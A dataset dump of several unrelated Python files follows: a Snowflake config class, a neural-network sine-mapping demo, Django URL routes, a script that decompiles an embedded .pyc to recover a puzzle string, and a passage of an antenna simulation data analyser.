content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
from dataclasses import dataclass, field
from typing import Optional
from serde import deserialize
from metaphor.common.filter import DatasetFilter
from metaphor.snowflake.auth import SnowflakeAuthConfig
from metaphor.snowflake.utils import DEFAULT_THREAD_POOL_SIZE
@deserialize
@dataclass
class SnowflakeRunConfig(SnowflakeAuthConfig):
    """Run configuration for the Snowflake connector.

    Extends the authentication config with crawler-level options.
    """

    # Restrict crawling to (or exclude) specific databases/schemas/tables.
    # A fresh, permissive DatasetFilter is built per instance.
    filter: Optional[DatasetFilter] = field(default_factory=DatasetFilter)

    # Upper bound on concurrent queries issued to the database.
    max_concurrency: Optional[int] = DEFAULT_THREAD_POOL_SIZE
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#####################################################################
# Peach - Python para Inteligência Computacional
# José Alexandre Nalon
#
# Este arquivo: demo07.py
# Demonstração e teste, Mapeamento de uma função não linear.
#####################################################################
from numpy import *
import random
import peach as p
# Demo overview
#
# A neural network can be used to map a non-linear function, such as a
# sinusoid or similar. The technique requires a more complex network:
# one input, a relatively large hidden layer, and an output layer whose
# activation is the identity, which sums the mappings performed by the
# hidden units.

# Build the network. The activation functions are a sigmoid for the
# hidden layer and the identity for the output layer; the learning rule
# is back-propagation (the default).
#
# Several outputs, evenly distributed around the evaluation point, are
# used so that the obtained error is more significant wherever it
# exists. The evaluation point is inputs // 2; a wider neighbourhood
# yields better results.
inputs = 7
nn = p.FeedForward((inputs, 200, inputs), lrule=p.BackPropagation(0.01), bias=True)
nn.phi = (p.Sigmoid, p.Linear)
delta = linspace(-0.1, 0.1, inputs)

elog = []
error = 1
i = 0
while i < 2000:
    # Draw a random point x; the network input vector xo is a small
    # neighbourhood around it, and the desired response is the sine
    # evaluated at those points.
    xo = random.uniform(-1.0, 1.0)
    x = xo + delta
    d = sin(pi*x)
    # Predict, then compute the error and let the network learn.
    # NOTE(review): y is unused, but nn(x) may update internal state of
    # the network used by learn() -- kept as in the original demo.
    y = nn(x)
    error = nn.learn(x, d)
    elog.append(error)
    # Increment the attempt counter.
    i = i + 1

# If matplotlib is installed, plot the original function against the
# network's prediction and save the figure as demo07.eps.
try:
    from matplotlib import *
    from matplotlib.pylab import *

    x = linspace(-1, 1, 200)
    y = sin(pi*x)
    ye = []
    for xo in x:
        yn = nn(delta + xo)
        ye.append(yn[inputs // 2])
    ye = array(ye)
    subplot(211)
    # hold(True) was removed in matplotlib 3.0 (overplotting is now the
    # default), and calling it would raise an AttributeError that the
    # ImportError handler below would not catch -- so it is dropped.
    grid(True)
    plot(x, y, 'b--')
    plot(x, ye, 'g')
    xlim([-1, 1])
    # Raw string: '\h' is an invalid escape sequence in a plain literal.
    legend([r"$y$", r"$\hat{y}$"])
    subplot(212)
    grid(True)
    plot(arange(0, 2000, 10), array(elog, dtype=float)[::10])
    savefig("demo07.eps")
except ImportError:
    pass
|
nilq/baby-python
|
python
|
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static

from . import views

# Routes for the team-lead section. Each entry is (regex, view, url-name);
# a name of None means the pattern is registered without a reverse() name.
_route_specs = [
    (r'^$', views.home_teamlead, None),
    (r'^index_teamlead$', views.index_teamlead, 'index_teamlead'),
    (r'^holidays_teamlead$', views.holidays_teamlead, 'holidays_teamlead'),
    (r'^attendance_teamlead$', views.attendance_teamlead, 'attendance_teamlead'),
    (r'^salary_teamlead$', views.salary_teamlead, 'salary_teamlead'),
    (r'^salaryview_teamlead$', views.salaryview_teamlead, 'salaryview_teamlead'),
    (r'^profile_teamlead$', views.profile_teamlead, 'profile_teamlead'),
    (r'^editprofile_teamlead$', views.editprofile_teamlead, 'editprofile_teamlead'),
    (r'^compose_teamlead$', views.compose_teamlead, 'compose_teamlead'),
    (r'^changepwd_teamlead$', views.changepwd_teamlead, 'changepwd_teamlead'),
    (r'^leavesRequest_teamlead$', views.leave_teamlead, 'leave_teamlead'),
    (r'^mailview_teamlead$', views.mailview_teamlead, 'mailview_teamlead'),
    (r'^employee_teamlead$', views.employee_teamlead, 'employee_teamlead'),
]

urlpatterns = [
    url(pattern, view) if name is None else url(pattern, view, name=name)
    for pattern, view, name in _route_specs
]
|
nilq/baby-python
|
python
|
from base64 import b64decode
from zlib import decompress
from os import system

# Rebuild a .pyc from an embedded zlib+base64 payload and decompile it
# with uncompyle6 into a readable Python source listing.
inputFile = "handcrafted-pyc.py_bc552f58fe2709225ca0768c131dd14934a47305"
# Magic number + timestamp bytes prepended so the dump is a valid .pyc
# header for the decompiler. TODO(review): confirm the target Python
# version this magic corresponds to.
magicHeader = b"\x03\xf3\x0d\x0a\xfb\x1c\x32\x59"
outputPycFile = "dump.pyc"
outputSrcFile = "output.py"
uncompyleExe = "uncompyle6"
code = 'eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux' \
       '+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU' \
       '3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMru' \
       'ckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2' \
       'JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfq' \
       'mQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5' \
       'HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4A' \
       'VAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe' \
       '/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ== '
content = decompress(b64decode(code))
# Context manager guarantees the handle is closed even if the write
# fails; also avoids shadowing the (Python 2) builtin name `file`.
with open(outputPycFile, 'wb') as pyc_out:
    pyc_out.write(magicHeader + content)
system(f"{uncompyleExe} {outputPycFile} > {outputSrcFile}")
def ROT_TWO(_list):
    """Swap the two topmost stack entries in place, mimicking the
    ROT_TWO bytecode; a stack with fewer than two items is untouched.
    Returns the same list object."""
    if len(_list) < 2:
        return _list
    _list[-1], _list[-2] = _list[-2], _list[-1]
    return _list
def BINARY_ADD(_list):
    """Pop the two topmost stack entries and push their sum
    (second-from-top + top), mimicking the BINARY_ADD bytecode;
    a stack with fewer than two items is untouched.
    Returns the same list object."""
    if len(_list) < 2:
        return _list
    top = _list.pop()
    _list[-1] = _list[-1] + top
    return _list
# Replay the stack-machine opcodes printed in the decompiled listing to
# recover the string the bytecode builds: LOAD_CONST pushes a character,
# ROT_TWO swaps, BINARY_ADD concatenates.
stack = []
# `with` ensures the source listing is closed; the original leaked the
# handle via `for line in open(...)`.
with open(outputSrcFile) as src_file:
    for line in src_file:
        if "LOAD_CONST" in line:
            try:
                stack.append(chr(int(line.split()[2])))
            except ValueError:
                pass  # constant argument is not a plain integer; skip
        elif "ROT_TWO" in line:
            stack = ROT_TWO(stack)
        elif "BINARY_ADD" in line:
            stack = BINARY_ADD(stack)
print(stack)
|
nilq/baby-python
|
python
|
import numpy as np
from scipy.signal import find_peaks
import os
import pycst_ctrl
class PyCstDataAnalyser:
    """ Used to analyse data exported by CST"""

    def __init__(self, opts):
        """Read every goal/weight/setting from the *opts* dict; each entry
        falls back to the default shown in the corresponding opts.get call."""
        # Initialize attributes
        # Polarization indicator
        self.pol_ind = opts.get('pol_ind', 'lin_dir')
        # Samples in CST farfield data
        self.np_theta = opts.get('np_theta', 360)
        self.np_phi = opts.get('np_phi', 5)
        # Normalization factor for all objective value,
        # all object values will be normalized by (goal_val*norm_factor), which represents the relative tolerance
        # for each goal. This factor aims to bring multiple types of objective values into same range in
        # one cost function.
        self.norm_factor = opts.get('norm_factor', 0.1)
        # Taper definition in dB
        self.taper = opts.get('taper', -12)
        # Weight for rotational symmetry evaluation
        self.rotsym_goal_val = opts.get('rotsym_goal_val', 0)
        self.rotsym_weight = opts.get('rotsym_weight', 0)
        # Goal and Weight for cx-pol level evaluation
        self.cxlevel_goal_val = opts.get('cxlevel_goal_val', -35)
        self.cxlevel_weight = opts.get('cxlevel_weight', 0)
        # Goal and Weight for taper angle evaluation
        self.taperang_goal_range = opts.get('taperang_goal_range', np.array([10, 24]))
        self.taperang_weight = opts.get('taperang_weight', 0)
        # Goal and Weight for SLL evaluation
        self.sll_goal_val = opts.get('sll_goal_val', -30)
        self.sll_weight = opts.get('sll_weight', 0)
        # Goal and weight for Farfield AR evaluation
        self.ar_ff_goal = opts.get('ar_ff_goal', 0)
        # self.ar_ff_max_goal = opts.get('ar_ff_max_goal', 3)
        self.ar_ff_mae_weight = opts.get('ar_ff_mae_weight', 0)
        self.ar_ff_max_weight = opts.get('ar_ff_max_weight', 0)
        # Frequency range within which the S parameters are requested to be evaluated
        self.spara_eva_freq_range_vec = opts.get('spara_eva_freq_range_vec', np.array([85, 110]))
        # Goal and Weight for S11 evaluation in db value
        self.spara_file_name_lst = opts.get('spara_file_name_lst', ['S-Parameters_S1(1),1(1).txt'])
        self.spara_goal_lst = opts.get('spara_goal_lst', [-40])
        self.spara_mae_weight_lst = opts.get('spara_mae_weight_lst', [0])
        self.spara_maxnorm_weight_lst = opts.get('spara_maxnorm_weight_lst', [0])
        # Goal and Weight for S11 evaluation in linear value
        self.spara_lin_goal_lst = opts.get('spara_lin_goal_lst', [0.01])
        self.spara_lin_mae_weight_lst = opts.get('spara_lin_mae_weight_lst', [0])
        self.spara_lin_max_weight_lst = opts.get('spara_lin_max_weight_lst', [0])
        # The dB/linear S-parameter evaluations are only enabled when their
        # goal lists line up one-to-one with the file-name list.
        if len(self.spara_goal_lst) == len(self.spara_file_name_lst):
            self.spara_eval_db = True
        else:
            self.spara_eval_db = False
        if len(self.spara_lin_goal_lst) == len(self.spara_file_name_lst):
            self.spara_eval_lin = True
        else:
            self.spara_eval_lin = False
        # Frequency range within which the NR AR are requested to be evaluated
        self.nf_ar_eva_freq_range_vec = opts.get('nf_ar_eva_freq_range_vec', np.array([85, 110]))
        # Goal and Weight for nearfield AR evaluation
        self.nf_ar_file_name = opts.get('nf_ar_file_name', 'AR_AllFreq.txt')
        self.nf_ar_goal = opts.get('nf_ar_goal', 0)
        self.nf_ar_mae_weight = opts.get('nf_ar_mae_weight', 0)
        self.nf_ar_maxnorm_weight = opts.get('nf_ar_maxnorm_weight', 0)

    @staticmethod
    def func_taper_angle_get(theta_vec, dir_co_norm_arr, taper):
        """Return the largest |theta| (over all three cuts) at which the
        normalized co-pol directivity is still at or above *taper* dB."""
        index_barr = dir_co_norm_arr >= taper
        # Stack theta three times so the boolean mask of the 3-cut array
        # can index it directly.
        theta_arr = np.vstack((theta_vec, theta_vec, theta_vec))
        theta_arr_tapered = theta_arr[index_barr]
        taper_ang = np.amax(np.absolute(theta_arr_tapered))
        return taper_ang

    @staticmethod
    def func_exp_ff_data_proc(export_folder, filename, np_theta, np_phi, pol_ind='RHCP'):
        """Load one exported CST farfield cut file and return theta plus raw,
        normalized and peak co-/cx-/abs-pol directivity arrays and AR data.

        Returns a 12-tuple:
        (theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr,
         dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr,
         peak_co_cvec, peak_cx_cvec, peak_abs_cvec,
         ar_arr, ar_boresight_cvec)
        """
        # Get export farfield data file
        full_exp_ff_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 2
        cut_data = np.genfromtxt(full_exp_ff_file, skip_header=headerlin)
        # Get Theta (Col.1)
        theta_arr = cut_data[:, 0].reshape(np_phi, np_theta)
        # Append theta[0]+360 so each cut wraps around and closes the pattern.
        theta_arr = np.c_[theta_arr, 360 + theta_arr[:, 0]]
        theta_vec = theta_arr[0, :]
        # Decide data column index for co-pol and cx-pol
        if pol_ind == 'LHCP':
            co_col_index = 3
            cx_col_index = 5
        else:  # pol_ind = 'RHCP' or 'lin_dir'
            co_col_index = 5
            cx_col_index = 3
        # Get directivity for Co-Pol (Col.4 is LHCP, Col.6 is RHCP or Co-pol if linear direction is chose) for each cut
        dir_co_all = cut_data[:, co_col_index].reshape(np_phi, np_theta)
        # Rows 2:5 keep three of the np_phi cuts -- presumably the middle
        # phi cuts of a 5-cut export; TODO(review) confirm against exporter.
        dir_co_arr = dir_co_all[2:5, :]
        dir_co_arr = np.c_[dir_co_arr, dir_co_arr[:, 0]]
        peak_co_cvec = dir_co_arr[:, np_theta // 2, np.newaxis]  # Transform to (3,1) column vector
        dir_co_norm_arr = dir_co_arr - peak_co_cvec
        # Get directivity for Cx-Pol (Col.4 is LHCP, Col.6 is RHCP or Cx-pol if linear direction is chose) for each cut
        dir_cx_all = cut_data[:, cx_col_index].reshape(np_phi, np_theta)
        dir_cx_arr = dir_cx_all[2:5, :]
        dir_cx_arr = np.c_[dir_cx_arr, dir_cx_arr[:, 0]]
        peak_cx_cvec = dir_cx_arr.max(axis=1).reshape(-1, 1)
        # NOTE(review): cx-pol is normalized by the CO-pol boresight peak,
        # so values read as dB relative to the co-pol peak; peak_cx_cvec is
        # only returned for reference.
        dir_cx_norm_arr = dir_cx_arr - peak_co_cvec
        # Get directivity for Abs (Col.3) for each cut
        dir_abs_all = cut_data[:, 2].reshape(np_phi, np_theta)
        dir_abs_arr = dir_abs_all[2:5, :]
        dir_abs_arr = np.c_[dir_abs_arr, dir_abs_arr[:, 0]]
        peak_abs_cvec = dir_abs_arr[:, np_theta // 2, np.newaxis]  # Transform to (3,1) column vector
        dir_abs_norm_arr = dir_abs_arr - peak_abs_cvec
        # Get AR (Col.8) for each cut
        ar_all = cut_data[:, 7].reshape(np_phi, np_theta)
        ar_arr = ar_all[2:5, :]
        ar_arr = np.c_[ar_arr, ar_arr[:, 0]]
        ar_boresight_cvec = ar_arr[:, np_theta // 2, np.newaxis]  # Transform to (3,1) column vector
        return theta_vec, dir_co_arr, dir_cx_arr, dir_abs_arr, \
            dir_co_norm_arr, dir_cx_norm_arr, dir_abs_norm_arr, \
            peak_co_cvec, peak_cx_cvec, peak_abs_cvec, \
            ar_arr, ar_boresight_cvec

    def func_rotsym_objval_calc_mse(self, theta_vec, dir_co_norm_arr, taper, goal_val, weight):
        """
        This function calculates the weighted MSE between radiation pattern of each cut and average radiation pattern,
        the result is a scalar value which represents the rotational symmetry at this frequency.
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get the taper angle
        taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
        angle_range = np.array([-taper_ang, taper_ang])
        # Get theta vector within the taper angle
        index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
        theta_tapered_vec = theta_vec[index_bvec]
        # Calculate weight for directivity at different theta
        # (exponential decay from 1 at boresight to 0.1 at the taper angle)
        radpat_weight_vec = 10 ** ((-1) * (np.absolute(theta_tapered_vec) / taper_ang))
        # Calculate MSE between radiation pattern of each cut and average radiation pattern
        index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
        dir_co_norm_tapered_arr = dir_co_norm_arr[index_barr].reshape(-1, len(theta_tapered_vec))
        dir_co_norm_avg_tapered_vec = np.mean(dir_co_norm_tapered_arr, axis=0)
        # Calculate difference based on array broadcasting
        dir_co_sqrdiff_tapered_arr = (dir_co_norm_tapered_arr - dir_co_norm_avg_tapered_vec) ** 2
        mse_vec = np.mean(dir_co_sqrdiff_tapered_arr * radpat_weight_vec, axis=1)
        # Calculate objective value (truncated at the goal, then weighted)
        objective_val = max(mse_vec.sum() - goal_val, 0)
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_cxlevel_objval_calc_trunc(dir_cx_norm_arr, goal_val, weight, norm_factor):
        """
        This function calculates the cx-level which is the maximum level of normalized cx-pol among all cuts at one
        frequency.
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get the maximum level of normalized cx-pol among all cuts
        cxlevel = np.amax(dir_cx_norm_arr)
        # Calculate truncated objective value
        objective_val = max((cxlevel - goal_val), 0) / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val

    def func_taperang_objval_calc_rangetrunc(self, theta_vec, dir_co_norm_arr, taper, goal_range, weight, norm_factor):
        """
        This function calculates the truncated difference between simulated taper angle and expected taper angle range
        at one frequency.
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get the max taper angle of the radiation pattern
        taper_ang = self.func_taper_angle_get(theta_vec, dir_co_norm_arr, taper)
        range_cent = goal_range.mean()
        if (taper_ang >= goal_range[0]) and (taper_ang <= goal_range[1]):
            objective_val = 0  # Objective is 0 if simulated taper angle is in the expected range
        else:
            # Penalize by distance from the range centre, normalized.
            objective_val = abs(taper_ang - range_cent) / (range_cent * norm_factor)
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_sll_max_get(dir_co_norm_arr):
        """
        This function gets the max SLL of all cuts
        """
        cut_num = dir_co_norm_arr.shape[0]
        # Initialize an array to store SLL value of each cut
        sll_val_vec = np.zeros(cut_num)
        for i in range(cut_num):
            # Get peaks of each cut
            dir_co_norm_cut_vec = dir_co_norm_arr[i, :]
            peak_index, properties = find_peaks(dir_co_norm_cut_vec)
            peaks = dir_co_norm_cut_vec[peak_index]
            # Sort peaks in ascending order
            pks_sort = np.sort(peaks)
            if 0 == len(pks_sort):  # Probably there is no radiation at all due to large reflection coefficient
                sll_val_vec[i] = 65535
            elif 1 == len(pks_sort):
                sll_val_vec[i] = -128  # Set SLL value to a value that will always be lower than the goal
            else:
                sll_val_vec[i] = pks_sort[-2]  # Not always the 1st sidelobe but the highest one
        sll_val_max = np.amax(sll_val_vec)
        return sll_val_max

    def func_sll_objval_calc_trunc(self, dir_co_norm_arr, goal_val, weight, norm_factor):
        """
        This function calculates truncated difference between max SLL of all cuts and expected SLL at this frequency
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get max SLL of all cuts
        sll_val_max = self.func_sll_max_get(dir_co_norm_arr)
        objective_val = max((sll_val_max - goal_val), 0) / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_ar_ff_objval_calc_maetrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
        """
        This function calculates the truncated MAE of AR over given beamwidth (angle range) at one frequency
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get AR array within the taper angle
        index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
        theta_tapered_vec = theta_vec[index_bvec]
        index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
        ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
        # Get the max AR over the given beamwidth among all cuts
        max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
        # Calculate the truncated difference simulated AR and expected AR over the given beamwidth
        diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
        # NOTE(review): norm_factor is accepted but deliberately unused here
        # (the normalized variant is kept commented out below).
        # objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
        objective_val = diff_trunc_vec.mean() / (abs(goal_val))
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_ar_ff_objval_calc_maxtrunc(theta_vec, ar_arr, angle_range, goal_val, weight, norm_factor):
        """
        This function calculates truncated difference between max AR over given beamwidth for all cuts at one frequency
        The goal and weight have already been considered in the return value at this frequency sample, so the return
        value could be used to calculate truncated MAE over all frequency samples.
        """
        # Get AR array within the taper angle
        index_bvec = np.logical_and(theta_vec >= angle_range[0], theta_vec <= angle_range[1])
        theta_tapered_vec = theta_vec[index_bvec]
        index_barr = np.vstack((index_bvec, index_bvec, index_bvec))
        ar_tapered_arr = ar_arr[index_barr].reshape(-1, len(theta_tapered_vec))
        # Get the max AR among all cuts
        max_ar_tapered_vec = np.amax(ar_tapered_arr, axis=0)
        # Limit the evaluate frequency range
        diff_trunc_vec = np.maximum((max_ar_tapered_vec - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        # NOTE(review): norm_factor is accepted but deliberately unused here.
        # objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
        objective_val = max_diff_trunc / (abs(goal_val))
        # objective_val = max_diff_trunc
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_cst_spara_data_proc(exp_data_folder, singlerun_data_folder_name, spara_filename):
        """Load a CST-exported S-parameter file and return
        (freq_vec, |S| linear, |S| in dB)."""
        # Get export S Para data file
        full_spara_file = os.path.join(exp_data_folder, singlerun_data_folder_name, spara_filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        s_mag_db = 20 * np.log10(s_mag_lin)
        return freq_vec, s_mag_lin, s_mag_db

    @staticmethod
    def func_meas_spara_data_proc(meas_data_folder, meas_spara_filename):
        """
        Process s-parameter data measured by Keysight PNA-X with OML mmWave head
        Returns (freq_vec in GHz, |S| in dB, phase in degrees).
        """
        # Get export S Para data file
        meas_spara_filepath = os.path.join(meas_data_folder, meas_spara_filename)
        # Load data
        headerlin = 7
        delimiter_str = ","
        spara_data = np.genfromtxt(meas_spara_filepath, skip_header=headerlin, delimiter=delimiter_str)
        # Parses data
        freq_vec = spara_data[:, 0] / 1e9  # Convert to GHz
        s_mag_db = spara_data[:, 1]
        s_ph_deg = spara_data[:, 2]
        return freq_vec, s_mag_db, s_ph_deg

    @staticmethod
    def func_spara_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
        """Weighted, normalized truncated MAE of |S| (dB) above *goal_val*
        within *freq_range_vec*."""
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
        objective_val = diff_trunc_vec.mean() / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_spara_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight, norm_factor):
        """Weighted, normalized truncated MAX of |S| (dB) above *goal_val*
        within *freq_range_vec*."""
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_db[index_bvec] - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        objective_val = max_diff_trunc / (abs(goal_val) * norm_factor)
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_spara_lin_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Weighted truncated MAE of linear |S| above *goal_val* within
        *freq_range_vec* (no normalization)."""
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
        objective_val = diff_trunc_vec.mean()
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_spara_lin_objval_calc_maxtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Weighted truncated MAX of linear |S| above *goal_val* within
        *freq_range_vec* (no normalization)."""
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((s_mag_lin[index_bvec] - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        objective_val = max_diff_trunc
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_nf_ar_objval_calc_maetrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Weighted truncated MAE of near-field axial ratio above *goal_val*
        within *freq_range_vec*."""
        # Get export S Para data file
        full_nr_ar_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
        # Parses data
        freq_vec = nf_ar_data[:, 0]
        nf_ar_real = nf_ar_data[:, 1]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
        objective_val = diff_trunc_vec.mean()
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_nf_ar_objval_calc_maxnormtrunc(export_folder, filename, goal_val, freq_range_vec, weight):
        """Weighted, normalized truncated MAX of near-field axial ratio above
        *goal_val* within *freq_range_vec*."""
        # Get export S Para data file
        full_nr_ar_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        nf_ar_data = np.genfromtxt(full_nr_ar_file, skip_header=headerlin)
        # Parses data
        freq_vec = nf_ar_data[:, 0]
        nf_ar_real = nf_ar_data[:, 1]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_range_vec[0], freq_vec <= freq_range_vec[1])
        diff_trunc_vec = np.maximum((nf_ar_real[index_bvec] - goal_val), 0)
        max_diff_trunc = diff_trunc_vec.max()
        # NOTE(review): normalizes by |goal|/2 rather than goal*norm_factor
        # like the S-parameter variants -- presumably intentional; confirm.
        objective_val = max_diff_trunc / (abs(goal_val) / 2)
        objective_val *= weight
        return objective_val

    @staticmethod
    def func_spara_data_sample_extract(export_folder, filename, freq_limit_vec, sample_num):
        """Return *sample_num* evenly spaced (freq, linear |S|) samples taken
        from the data restricted to *freq_limit_vec*."""
        # Get export S Para data file
        full_spara_file = os.path.join(export_folder, filename)
        # Load data
        headerlin = 0
        spara_data = np.genfromtxt(full_spara_file, skip_header=headerlin)
        # Parses data
        freq_vec = spara_data[:, 0]
        s_mag_lin = spara_data[:, 1]
        # s_mag_db = 20 * np.log10(s_mag_lin)
        # s_phase = spara_data[:, 2]
        # Limit the evaluate frequency range
        index_bvec = np.logical_and(freq_vec >= freq_limit_vec[0], freq_vec <= freq_limit_vec[1])
        freq_range_vec = freq_vec[index_bvec]
        s_mag_range_lin_vec = s_mag_lin[index_bvec]
        # Get the samples from the data within the range
        data_num = len(s_mag_range_lin_vec)  # data points including the first and last points
        # Generate sample index between the first index (0) and the last index (data_num -1) (include last index)
        sample_index = np.linspace(0, data_num - 1, sample_num).astype(int)  # Cast the sample index to integer
        freq_sample_vec = freq_range_vec[sample_index]
        s_mag_lin_sample_vec = s_mag_range_lin_vec[sample_index]
        return freq_sample_vec, s_mag_lin_sample_vec

    def func_cst_data_spara_analyse(self, singlerun_export_folder):
        """Evaluate every configured S-parameter goal (dB and/or linear) for
        one run; returns a vector of the enabled objective values."""
        # Evaluate S parameters
        spara_objval_vec = np.array([])
        spara_eva_freq_range_vec = self.spara_eva_freq_range_vec
        for i in range(len(self.spara_file_name_lst)):
            spara_file_name = self.spara_file_name_lst[i]
            if self.spara_eval_db is True:  # if configuration is valid
                # Goal and weight for spara in db values
                spara_goal_val = self.spara_goal_lst[i]
                spara_mae_weight = self.spara_mae_weight_lst[i]
                spara_maxnorm_weight = self.spara_maxnorm_weight_lst[i]
                if spara_mae_weight != 0:
                    spara_objval_mae = self.func_spara_objval_calc_maetrunc(singlerun_export_folder, spara_file_name,
